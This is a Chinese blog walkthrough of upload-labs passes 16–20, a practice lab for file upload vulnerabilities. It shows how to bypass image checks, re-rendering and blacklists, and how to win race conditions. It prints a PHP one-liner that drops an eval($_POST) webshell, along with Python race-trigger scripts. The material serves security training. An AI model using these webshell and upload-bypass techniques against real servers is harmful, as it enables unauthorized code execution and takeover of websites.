文件上传漏洞练习 upload-labs(16~20)【exif图片检测,二次渲染绕过,上传条件竞争,包含条件竞争,文件名可控】

最新推荐文章于 2024-05-11 01:15:56 发布
最新推荐文章于 2024-05-11 01:15:56 发布
阅读量637 收藏 3
点赞数 2
分类专栏: 网络安全 文章标签: php web 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/119906543
版权

写在前面

下面几道题目与php源码、图片木马有关,如果你对php或者图片木马并不是很熟悉,或者看起来较为吃力,可以点击下方

源码分析链接

会有基础知识和图片马的知识基础,同时在pass-03中有源码分析和对各个函数的讲解。
图片木马在下方pass也会有讲解,也可以看看。

Pass 16

本题使用的检测函数为exif_imagetype()
来看看它的详细解释
在这里插入图片描述
同样也是对图片进行检测,大概就是读取第一个字节并检查后缀名,在开始之前,你需要在php配置中开启php_exif()选项。
在这里插入图片描述
其本身也仅仅是检测是否为图片,所以之前的方法仍旧可以使用。
思路仍然是:
首先使用copy制作图片马,上传后解析,这里放出几张截图。
上传成功,解析成功
在这里插入图片描述
连接即可:
在这里插入图片描述

Pass 17

这一关对上传图片进行了判断了后缀名、content-type,以及利用imagecreatefromxxx判断是否为相应格式的图片,最后再做了一次二次渲染,但是后端二次渲染需要找到渲染后的图片里面没有发生变化的Hex地方,添加一句话,通过文件包含漏洞执行一句话,使用蚁剑进行连接。

这里用到的工具是:010Editor

它能够以16进制打开各种文件,然后对文件进行编辑,还能够在上面运行脚本,文件比较等等。

思路:二次渲染会对图片特定地方进行重写,按照标准格式进行存储,先上传一张正常gif然后下载上传完毕后的图片,作对比,在即使经过二次渲染也没有改变的地方植入木马,最后文件包含执行。

顺带一提,这里推荐使用gif格式进行,gif图片的特点是无损。

首先用上传前和上传后的图片进行比较:
在这里插入图片描述
然后选中上传后未被改变的位置插入木马:
在这里插入图片描述
保存后上传并解析:
在这里插入图片描述
解析内容明显发生了变化。
最后蚁剑连接:
在这里插入图片描述
这里提供一张图片马作为参考,你可以直接上传后连接:
在这里插入图片描述

Pass 18

本体是条件竞争,提示是:
在这里插入图片描述
那么,先来进行代码审计吧:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

代码大概含义就是,对上传的文件首先进行白名单比对,如果是规定的格式,那么就重命名后储存,如果是其他文件就进行删除操作,也就是unlink() 函数。

所以事实上你仍然可以使用之前的图片木马的方式完成本题,但是这里主要考察的是条件竞争,我们可以用其他方法来完成本题。

条件竞争具有一定的实战意义,由于实际情况下的网站很难给你文件包含的机会,也就是说,你很难对图片进行解析来获得权限。并且普通的php几乎不允许上传。

这里的关键就在于对非法文件进行了删除操作,服务器对文件的读取和删除包括代码执行都需要时间,在这一小段时间内,文件仍然存在于服务器上,你就可以进行触发等操作。

使用的脚本更改为:

<?php fputs(fopen('bin.php','w'),'<?php @eval($_POST["bin"])?>');?>

也就是一旦触发这个脚本就会在当前目录下新建一个shell.php

并且这里是不需要文件包含漏洞来触发的,只要前端访问到即可。

或许你会奇怪为什么同样是文件,这里就不需要文件包含漏洞了呢?
这是因为当上传图片马时,仅在前端访问仍然是一张图,会以图片形式打开,并不能解析代码。就像我们直接上传php代码文件是可以直接连接,当在前端打开也会以代码形式解析,所以这里当我们请求到php代码时就会解析文件,从而产生新的木马。

具体步骤:
首先,上传php文件然后bp拦截下来,送至爆破模块。
在这里插入图片描述
改成空payload
在这里插入图片描述
点击"clear"清除爆破点
在这里插入图片描述
将线程提高至20,开始爆破,并用python脚本触发
在这里插入图片描述
python脚本:

import requests
url = "http://localhost/upload-labs-master/upload/newshell.php"#换上你自己的网址
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print('no')

出现ok,访问并触发成功。
在这里插入图片描述

最后蚁剑连接即可。
在这里插入图片描述

Pass 19

同样是条件竞争
从源码来看的话,服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。所以不能直接上传php文件了。

那么就是图片木马,然后利用文件包含漏洞解析

在上传重命名之前能够在文件包含中进行触发。

bp操作没有太大区别,同样是空payload不断发包。

要修改一下脚本:

import requests
url = "http://xxx.xxx.xxx.xx/upload-labs/include.php?file=upload/pass19.png"
while True:
    html = requests.get(url)
    if ( 'Warning'  not in  str(html.text)):
        print('ok')
        break

Less 20

在这里插入图片描述
没有对上传的文件做判断,只对用户输入的文件名做判断
后缀名黑名单
上传的文件名用户可控
黑名单用于用户输入的文件后缀名进行判断
move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /. 其实也就是00截断,点在16进制就是00咯

最后在处理文件路径时是加上用户输入的文件名,所以其实也算是文件路径可控

先准备PHP一句话木马,并把后缀名改为PNG再上传,思路和之前00截断相同,虽然是png但是以php形式储存。
所以你既可以直接使用点,也可以在16进制中改为00
在这里插入图片描述
上传成功
在这里插入图片描述
最后连接即可:
在这里插入图片描述

sayo.
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1935
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
Upload-Labs(16)
Braindance
02-28 378
前言 ​ 我在这道题上花了快一天的时间,但是也学到了不少姿势,觉得东西应该足够多,而且参考了的博客发现这道题算是有歧义的,不知道作者想要考察的点是哪一个,所以算是有两种解法吧,可惜的是两种方法都不算是大成功,只有部分成功执行了。 ​ 参考博客:upload-labs之pass 16详细分析 Pass-16 ​ 源码(三种图片的判定,只贴一个吧,篇幅小一点): $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传.
文件包含(session条件竞争
qq_64318364的博客
12-04 585
session条件竞争,简单复现
2024年文件上传漏洞upload部分通关教程)_upload文件上传漏洞2024最新百度、头条等公司网络安全社招面试题目
最新发布
2401_84265571的博客
05-11 250
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
文件上传漏洞——.user.ini与.htaccess
zhhhb1005的博客
07-18 888
htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相目录下的网页配置。通过htaccess文件,可以帮我们实现重新解析规则绕过黑名单。...
文件上传漏洞练习upload-labs通关记录(踩坑!!!)
Wuxia_Bai的博客
12-24 887
一步步做下来的真实记录,希望能帮助大家,避免踩坑!!!一个简单的记录,部分卡需要进行相应配置,均已说明。
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
upload-labs 中,我们可以学习和实践文件上传漏洞检测和防御方法,提高我们的安全技能。upload-labs 提供了多种文件上传漏洞的场景,供我们实践和学习。 部署 upload-labs(文件上传漏洞靶场)需要 PHP 和 ...
上传文件漏洞靶场upload-labs
09-27
上传文件漏洞靶场upload-labs,用于练习上传文件漏洞,学习web安全的小白可用。我的博客也有详细的使用教程
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞练习靶场upload-labs内有文件上传漏洞的各种类型绕过的例题,非常全面,对加深文件上传漏洞的理解、利用非常有帮助。
安装upload-labs
10-22
1. 学习文件上传漏洞课程:upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验,您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据卡提示信息练习upload-labs提供了多个卡...
文件上传upload-labs(一)
01-08
通过上传攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更加能理解和掌握; 使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉...
upload-labs通关(Pass-16~Pass-21)
箭雨镜屋
10-20 2986
Pass-16我也把Pass-14中的三种图片马都试了一下,都是可以上传成功并用蚁剑连接成功的,所以具体步骤这边就不写了,可以参照Pass-14(upload-labs通关(Pass-11~Pass-15)_箭雨镜屋-CSDN博客) 代码分析: function isImage($filename){ //需要开启php_exif模块 $image_type = exif_imagetype($filename); switch ($image_type) {
文件上传绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   键数据块定义
文件上传漏洞之——二次渲染逻辑性漏洞绕过
wsnbbz的博客
03-04 2938
漏洞形成 二次渲染的缘分逻辑存在漏洞,先将文件上传,之后再判断,符合就保存,不符合删除,可利用条件竞争来进行爆破上传 复现 1.上传一个图片马,抓包,访问图片马,抓包,发送到inturde添加?a=1爆破点 2.运行一万次,可看到有部分访问成功 ...
文件上传漏洞之——利用条件竞争绕过
wsnbbz的博客
03-04 4620
条件竞争漏洞 . 介绍 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相操作顺序设计的不合理时,将会导致此类问题的发生 原理 上传文件源代码里没有校验上传文件文件直接上传上传成功后才进行判断:如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除 由于服务器并发处理(同时)多个请求,假如a用户上传了木马文件,由于代码执行需要...
文件上传漏洞
qq_51553814的博客
07-13 269
文件上传 原理: 如果一个网站有文件上传,我们向该网站上传一个木马文件,如php文件。当我们通过相应的目录访问到该文件时,php文件内的代码发生了运行,这就是文件上传漏洞。 通过文件上传漏洞,我们可以写一个木马php文件 <php? eval(_POST['a']);?> 通过中国蚁剑连接到对应的文件上传目录,我们就可以连接到对应的url了,从而获取url里其他目录的文件 蚁剑的使用方法简单不加以说明 当然,当我们进行文件上传时,客户端或者是服务端不会让我们直接上传.php木马文件,会对前
Web条件竞争
沐沐的博客
04-19 2850
  最近,正好操作系统课上正在学进程的竞争系,再加上寒假安恒杯2月赛上有道web题考到了条件竞争漏洞的利用,所以就系统的学习和总结下条件竞争漏洞。一. 漏洞成因:线程编程中,为了保证数据操作的一致性,操作系统引入了锁机制,用于保证临界区代码的安全。通过锁机制,能够保证在多核多线程环境中,在某一个时间点上,只能有一个线程进入临界区代码,从而保证临界区中操作数据的一致性。临界区指的是一个访问共用资源...
图片木马
阿刁〇的博客
05-21 3052
文章目录图片木马原理条件漏洞防范制作方法 图片木马 顾名思义,看上去很像图片的木马。 木马必然是个可执行的程序文件,其后缀名是“exe”。 原理 以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。 条件 图片能够正常显示 包含可执行的恶意代码 漏洞防范 尽量使用最新的web服务器版本 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限) 可以的话,对图片进行二次处理,把
文件上传漏洞原理与实例测试
wuqiongrj的博客
07-22 1万+
0x00 什么是文件上传 为了让用户将文件上传到网站,就像是给危机服务器的恶意用户打开了另一扇门。即便如此,在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业员工有效地共享文件。允许用户上传图片,视频,头像和许多其他类型的文件。向用户提供的功能越多,Web应用受到攻击的风险和机会就越大,这种功能会被恶意用户利用,获
upload-labs条件竞争
08-21
上传实验(upload-labs)中,条件竞争可能会导致以下问题: 1. 文件覆盖:多个线程同时上传同一个文件,最后只有一个线程的文件被保留,其他线程上传文件被覆盖。 2. 文件丢失:多个线程同时上传文件,由于并发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值